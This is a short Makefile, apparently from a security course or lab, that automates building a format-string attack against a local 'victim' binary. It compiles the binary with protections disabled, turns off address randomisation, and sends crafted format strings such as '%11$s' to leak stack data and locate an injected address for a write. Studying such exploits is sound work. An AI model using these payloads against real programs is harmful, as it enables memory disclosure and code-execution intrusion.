# This is an attempt to automate the construction of an attack against
# the victim program that uses user input as a format string.
#

all: victim

victim: victim.c
	gcc -Wall -fno-stack-protector -z execstack -o victim victim.c

inspect: victim
	@# exploring the stack until we find the pointer to the string...
	setarch $$(arch) -R ./victim "$$(python -c "print '%#018lx  '*20")"
	@# using the $ formating symbol to pick the 'right' argument on the stack
	setarch $$(arch) -R ./victim '%11$$s'
	setarch $$(arch) -R ./victim '%7$$s'
	@# setarch $$(arch) -R ./victim '%13$$s'

findformat: victim
	@# try to find the actual format string characters on the stack
	@# adjust the repetition factors for the Bs to align the As 
	setarch $$(arch) -R ./victim "$$(python -c "print 'B'*14 + 'A'*8 + 'B'*5 + '\n' + '%#018lx  '*144")"
	@# lets try to write an address where the As are...
	@# ... does not work since argv strings cant contain nul bytes
	setarch $$(arch) -R ./victim "$$(python -c "print 'B'*14 + '\x43\x43\x43\x43\x43\x43\x43\x43' + 'B'*5 + '\n' + '%#018lx  '*144")"

clean:
	rm -f victim